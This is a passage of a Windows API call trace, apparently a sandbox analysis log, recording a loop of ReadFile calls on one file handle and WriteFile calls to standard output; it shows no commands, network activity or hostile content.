lpBuffer=0x2cefc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cefc0*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.775] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.775] GetFileType (hFile=0x4c) returned 0x1 [0131.775] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.775] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf010*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf010*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.775] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.775] GetFileType (hFile=0x4c) returned 0x1 [0131.775] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.775] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf060*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.775] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.776] GetFileType (hFile=0x4c) returned 0x1 [0131.776] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.776] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0b0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b0*, lpNumberOfBytesWritten=0x2ce0b4*=0x20, lpOverlapped=0x0) returned 1 [0131.776] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.776] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce0a0 | out: lpNewFilePointer=0x0) returned 1 [0131.776] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.776] ReadFile (in: hFile=0x54, lpBuffer=0x2ceed0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce0c0, lpOverlapped=0x0 | out: lpBuffer=0x2ceed0*, lpNumberOfBytesRead=0x2ce0c0*=0x200, lpOverlapped=0x0) returned 1 [0131.776] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.776] GetFileType (hFile=0x4c) returned 0x1 [0131.776] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0131.776] GetFileType (hFile=0x4c) returned 0x1 [0131.776] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.776] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceed0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2ceed0*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.776] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.776] GetFileType (hFile=0x4c) returned 0x1 [0131.776] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.776] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cef20*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.776] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.776] GetFileType (hFile=0x4c) returned 0x1 [0131.776] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.776] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cef70*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.776] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.776] GetFileType (hFile=0x4c) returned 0x1 [0131.776] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.776] WriteFile (in: hFile=0x4c, lpBuffer=0x2cefc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cefc0*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.776] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.776] GetFileType (hFile=0x4c) returned 0x1 [0131.777] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.777] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf010*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf010*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.777] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0131.777] GetFileType (hFile=0x4c) returned 0x1 [0131.777] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.777] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf060*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.777] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.777] GetFileType (hFile=0x4c) returned 0x1 [0131.777] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.777] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0b0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b0*, lpNumberOfBytesWritten=0x2ce0b4*=0x20, lpOverlapped=0x0) returned 1 [0131.777] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.777] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce0a0 | out: lpNewFilePointer=0x0) returned 1 [0131.777] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.777] ReadFile (in: hFile=0x54, lpBuffer=0x2ceed0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce0c0, lpOverlapped=0x0 | out: lpBuffer=0x2ceed0*, lpNumberOfBytesRead=0x2ce0c0*=0x200, lpOverlapped=0x0) returned 1 [0131.777] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.777] GetFileType (hFile=0x4c) returned 0x1 [0131.777] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.777] GetFileType (hFile=0x4c) returned 0x1 [0131.777] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.777] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceed0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2ceed0*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.777] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.777] GetFileType (hFile=0x4c) returned 0x1 [0131.777] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.777] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, 
lpOverlapped=0x0 | out: lpBuffer=0x2cef20*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.777] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.777] GetFileType (hFile=0x4c) returned 0x1 [0131.777] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.777] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cef70*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.777] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.777] GetFileType (hFile=0x4c) returned 0x1 [0131.777] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.777] WriteFile (in: hFile=0x4c, lpBuffer=0x2cefc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cefc0*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.777] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.778] GetFileType (hFile=0x4c) returned 0x1 [0131.778] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.778] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf010*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf010*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.778] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.778] GetFileType (hFile=0x4c) returned 0x1 [0131.778] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.778] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf060*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.778] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.778] GetFileType (hFile=0x4c) returned 0x1 [0131.778] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.778] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0b0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: 
lpBuffer=0x2cf0b0*, lpNumberOfBytesWritten=0x2ce0b4*=0x20, lpOverlapped=0x0) returned 1 [0131.778] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.778] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce0a0 | out: lpNewFilePointer=0x0) returned 1 [0131.778] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.778] ReadFile (in: hFile=0x54, lpBuffer=0x2ceed0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce0c0, lpOverlapped=0x0 | out: lpBuffer=0x2ceed0*, lpNumberOfBytesRead=0x2ce0c0*=0x200, lpOverlapped=0x0) returned 1 [0131.778] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.778] GetFileType (hFile=0x4c) returned 0x1 [0131.778] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.778] GetFileType (hFile=0x4c) returned 0x1 [0131.778] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.778] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceed0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2ceed0*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.778] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.778] GetFileType (hFile=0x4c) returned 0x1 [0131.778] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.778] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cef20*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.778] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.778] GetFileType (hFile=0x4c) returned 0x1 [0131.778] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.778] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cef70*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.778] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.778] GetFileType (hFile=0x4c) returned 0x1 [0131.778] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0131.778] WriteFile (in: hFile=0x4c, lpBuffer=0x2cefc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cefc0*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.778] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.779] GetFileType (hFile=0x4c) returned 0x1 [0131.779] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.779] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf010*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf010*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.779] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.779] GetFileType (hFile=0x4c) returned 0x1 [0131.779] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.779] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf060*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.779] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.779] GetFileType (hFile=0x4c) returned 0x1 [0131.779] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.779] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0b0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b0*, lpNumberOfBytesWritten=0x2ce0b4*=0x20, lpOverlapped=0x0) returned 1 [0131.779] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.779] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce0a0 | out: lpNewFilePointer=0x0) returned 1 [0131.779] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.779] ReadFile (in: hFile=0x54, lpBuffer=0x2ceed0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce0c0, lpOverlapped=0x0 | out: lpBuffer=0x2ceed0*, lpNumberOfBytesRead=0x2ce0c0*=0x200, lpOverlapped=0x0) returned 1 [0131.779] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.779] 
GetFileType (hFile=0x4c) returned 0x1 [0131.779] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.779] GetFileType (hFile=0x4c) returned 0x1 [0131.779] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.779] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceed0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2ceed0*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.779] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.779] GetFileType (hFile=0x4c) returned 0x1 [0131.779] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.779] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cef20*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.779] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.779] GetFileType (hFile=0x4c) returned 0x1 [0131.779] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.779] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cef70*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.779] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.779] GetFileType (hFile=0x4c) returned 0x1 [0131.779] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.779] WriteFile (in: hFile=0x4c, lpBuffer=0x2cefc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cefc0*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.779] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.780] GetFileType (hFile=0x4c) returned 0x1 [0131.780] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.780] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf010*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf010*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 
[0131.780] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.780] GetFileType (hFile=0x4c) returned 0x1 [0131.780] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.780] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf060*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.780] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.780] GetFileType (hFile=0x4c) returned 0x1 [0131.780] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.780] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0b0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b0*, lpNumberOfBytesWritten=0x2ce0b4*=0x20, lpOverlapped=0x0) returned 1 [0131.780] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.780] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce0a0 | out: lpNewFilePointer=0x0) returned 1 [0131.780] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.780] ReadFile (in: hFile=0x54, lpBuffer=0x2ceed0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce0c0, lpOverlapped=0x0 | out: lpBuffer=0x2ceed0*, lpNumberOfBytesRead=0x2ce0c0*=0x200, lpOverlapped=0x0) returned 1 [0131.780] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.780] GetFileType (hFile=0x4c) returned 0x1 [0131.780] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.780] GetFileType (hFile=0x4c) returned 0x1 [0131.780] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.780] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceed0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2ceed0*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.780] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.780] GetFileType (hFile=0x4c) returned 0x1 [0131.780] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.780] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef20*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cef20*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.780] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.780] GetFileType (hFile=0x4c) returned 0x1 [0131.780] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.780] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cef70*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.780] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.780] GetFileType (hFile=0x4c) returned 0x1 [0131.781] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.781] WriteFile (in: hFile=0x4c, lpBuffer=0x2cefc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cefc0*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.781] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.781] GetFileType (hFile=0x4c) returned 0x1 [0131.781] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.781] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf010*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf010*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.781] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.781] GetFileType (hFile=0x4c) returned 0x1 [0131.781] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.781] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf060*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.781] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.781] GetFileType (hFile=0x4c) returned 0x1 [0131.781] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.781] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0b0*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b0*, lpNumberOfBytesWritten=0x2ce0b4*=0x20, lpOverlapped=0x0) returned 1 [0131.781] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.781] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce0a0 | out: lpNewFilePointer=0x0) returned 1 [0131.781] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.781] ReadFile (in: hFile=0x54, lpBuffer=0x2ceed0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce0c0, lpOverlapped=0x0 | out: lpBuffer=0x2ceed0*, lpNumberOfBytesRead=0x2ce0c0*=0x200, lpOverlapped=0x0) returned 1 [0131.781] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.781] GetFileType (hFile=0x4c) returned 0x1 [0131.781] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.781] GetFileType (hFile=0x4c) returned 0x1 [0131.781] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.781] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceed0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2ceed0*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.781] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.781] GetFileType (hFile=0x4c) returned 0x1 [0131.781] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.781] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cef20*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.781] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.781] GetFileType (hFile=0x4c) returned 0x1 [0131.781] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.781] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cef70*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.781] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.781] GetFileType 
(hFile=0x4c) returned 0x1 [0131.782] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.782] WriteFile (in: hFile=0x4c, lpBuffer=0x2cefc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cefc0*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.782] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.782] GetFileType (hFile=0x4c) returned 0x1 [0131.782] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.782] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf010*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf010*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.782] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.782] GetFileType (hFile=0x4c) returned 0x1 [0131.782] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.782] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf060*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.782] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.782] GetFileType (hFile=0x4c) returned 0x1 [0131.782] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.782] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf0b0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0b0*, lpNumberOfBytesWritten=0x2ce0b4*=0x20, lpOverlapped=0x0) returned 1 [0131.782] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.782] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce0a0 | out: lpNewFilePointer=0x0) returned 1 [0131.918] _get_osfhandle (_FileHandle=4) returned 0x54 [0131.918] ReadFile (in: hFile=0x54, lpBuffer=0x2ceed0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce0c0, lpOverlapped=0x0 | out: lpBuffer=0x2ceed0*, lpNumberOfBytesRead=0x2ce0c0*=0x200, lpOverlapped=0x0) returned 1 [0131.918] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0131.918] GetFileType (hFile=0x4c) returned 0x1 [0131.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.918] GetFileType (hFile=0x4c) returned 0x1 [0131.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.918] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceed0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2ceed0*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.918] GetFileType (hFile=0x4c) returned 0x1 [0131.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.918] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cef20*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.918] GetFileType (hFile=0x4c) returned 0x1 [0131.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.919] WriteFile (in: hFile=0x4c, lpBuffer=0x2cef70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cef70*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.919] GetFileType (hFile=0x4c) returned 0x1 [0131.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.919] WriteFile (in: hFile=0x4c, lpBuffer=0x2cefc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cefc0*, lpNumberOfBytesWritten=0x2ce0b4*=0x50, lpOverlapped=0x0) returned 1 [0131.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.919] GetFileType (hFile=0x4c) returned 0x1 [0131.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0131.919] WriteFile (in: hFile=0x4c, lpBuffer=0x2cf010*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce0b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf010*, 
